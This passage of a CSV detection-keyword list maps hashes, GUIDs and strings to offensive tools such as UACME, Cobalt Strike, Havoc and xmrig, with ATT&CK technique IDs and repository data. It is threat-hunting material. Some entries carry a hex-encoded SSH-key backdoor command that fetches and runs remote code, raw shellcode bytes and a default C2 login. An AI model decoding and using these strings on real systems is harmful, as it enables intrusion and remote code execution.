-*4c21f433ebb3a72668a36a707daed37afb5c3ed2402d60b1634a741c36f2ed10*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*4C3B106C-8782-4374-9459-851749072123*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*4C574B86-DC07-47EA-BB02-FD50AE002910*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*4cec28b4c00002245dffc8346be0cc11*,offensive_tool_keyword,SharpDoor,SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.,T1076 - T1059 - T1085 - T1070.004,TA0008 - TA0002 - TA0009,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/SharpDoor,1,0,N/A,7,3,298,64,2019-09-30T16:11:24Z,2019-09-29T02:24:07Z -*4d15af5a22467795c5367c3956746d01424795784f62ca3f30e4619c063338a5*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*4D1B765D-1287-45B1-AEDC-C4B96CF5CAA2*,offensive_tool_keyword,DarkWidow,Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140,TA0005 - TA0003 - TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/reveng007/DarkWidow,1,1,N/A,10,3,268,38,2023-08-03T22:37:44Z,2023-07-24T13:59:16Z -*4d262988fe9d252191947ab780535d496ed24fa27668cf76c6cb9b6474a391c4*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*4d5350c8-7f8c-47cf-8cde-c752018af17e*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,1,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*4d870a821d4104536f0ae7d1920748e9a6ea2dc828103470516a9a2f0b9601ff*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*4ddc82b4af931ab55f44d977bde81bfbc4151b5dcdccc03142831a301b5ec3c8*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*4DE43724-3851-4376-BB6C-EA15CF500C44*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,0,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*4E0CA74F5E074DFF389263D15E3913750EB437C1C3CD3B212C2998352023B980*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*4F2AD0E0-8C4D-45CB-97DE-CE8D4177E7BF*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*4fe9647d6a8bf4790df0277283f9874385e0cd05f3008406ca5624aba8d78924*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*4g3nt47/Striker*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*50050/SharpC2*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*5067F916-9971-47D6-BBCB-85FB3982584F*,offensive_tool_keyword,PowerShdll,Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.,T1059 - T1218 - T1216 - T1053 - T1118,TA0002 - TA0008 - TA0003,N/A,N/A,Defense Evasion,https://github.com/p3nt4/PowerShdll,1,0,N/A,N/A,10,1649,263,2021-03-17T02:02:23Z,2016-07-15T00:08:32Z -*5086CE01-1032-4CA3-A302-6CFF2A8B64DC*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*516280565958*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*516280565959*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*526f652d4d9e20a19374817eac75b914b75f3bfaecc16b65f979e5758ea62476*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*52a696ae714eb81033c477d1ec6c01389eef56c847609e89d360c2fb6899b4b6*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*53b83ef74e74ea230eeb916254753d886e8ec04e09cd8823af9f94660bdbc43b*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*5439CECD-3BB3-4807-B33F-E4C299B71CA2*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,0,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*555662D4CCBB940D87869E6295EC7CC74BB85D8C8FC5916EC34D1226704578C5*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*555AD0AC-1FDB-4016-8257-170A74CB2F55*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*5575c76987333427f74263e090910eae45817f0ede6b452d645fd5f9951210c9*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*55A48A19-1A5C-4E0D-A46A-5DB04C1D8B03*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,0,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*55F0368B-63DA-40E7-A8A5-289F70DF9C7F*,offensive_tool_keyword,BlockOpenHandle,Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners,T1050.005 - T1480,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/BlockOpenHandle,1,0,N/A,9,2,149,21,2023-04-27T05:42:51Z,2023-04-27T05:40:47Z -*56843f0410f4c97e8d0809bf7fe4c3e7efaf0dcefd595da58da07794d1709f27*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*574a8de72c4661a520afbcdbe4580335203d0f1b9da5d9ba3659d30d02b89466*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*57A893C7-7527-4B55-B4E9-D644BBDA89D1*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,0,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*57D4D4F4-F083-47A3-AE33-AE2500ABA3B6*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*59744929cc3a6d02d9ec26cc2945b00eaa6079c32602f460558adb9e7146f824*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*5994c2c930bf095841520a4e6859511485f6ad0eec0d660392462402c781a6ba*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*5a27534e0361dc8dce940b8732c306443af9944e23aaac6865131e1eb7570687*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*5A403F3C-9136-4B67-A94E-02D3BCD3162D*,offensive_tool_keyword,Pspersist,Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.,T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001,TA0005 ,N/A,N/A,Persistence,https://github.com/TheD1rkMtr/Pspersist,1,0,N/A,10,1,72,17,2023-08-02T02:27:29Z,2023-02-01T17:21:38Z -*5a40f11a99d0db4a0b06ab5b95c7da4b1c05b55a99c7c443021bff02c2cf93145c53ff5b*,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,1,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z -*5a6e7d5c10789763b0b06442dbc7f723f8ea9aec1402abedf439c6801a8d86f2*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*5A6F942E-888A-4CE1-A6FB-1AB8AE22AFFA*,offensive_tool_keyword,StackCrypt,Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads,T1027 - T1055.004 - T1486,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/StackCrypt,1,0,N/A,9,2,144,23,2023-08-02T02:25:12Z,2023-04-26T03:24:56Z -*5adad6349711b6f30ce8f37c24b7db4201c2002b7b2fec5093f81e1c3c50761f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*5b20f14c3b8322a354bf374d9cb463359c57d07f4031d788c7bc88bda6f833ee*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922*,offensive_tool_keyword,Openssh,Infecting SSH Public Keys with backdoors,T1098.003 - T1562.004 - T1021.004,TA0006 - TA0002 - TA0011,N/A,N/A,C2,https://blog.thc.org/infecting-ssh-public-keys-with-backdoors,1,0,N/A,10,9,N/A,N/A,N/A,N/A -*5c96d6754fab5329173536f2a4b29997c1661927f28b9ddcb091e4652e0bb014*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*5d1fc31a7caf39f1c766e15fb64d44f1417d3b6f2fe389f3e104218050c3746a*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*5dec1cfe7c0c2ec55c17fb44b43f7d14*,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*5E0812A9-C727-44F3-A2E3-8286CDC3ED4F*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*5E8106A6F89B053ED91C723D5D4CAE3FFC15F1CE*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*5e98194a01c6b48fa582a6a9fcbb92d6*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*5e98194a01c6b48fa582a6a9fcbb92d6*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*5F4DC47F-7819-4528-9C16-C88F1BE97EC5*,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,0,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -*5spider:password1234*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*61CE6716-E619-483C-B535-8694F7617548*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,0,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*61CE6716-E619-483C-B535-8694F7617548*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - 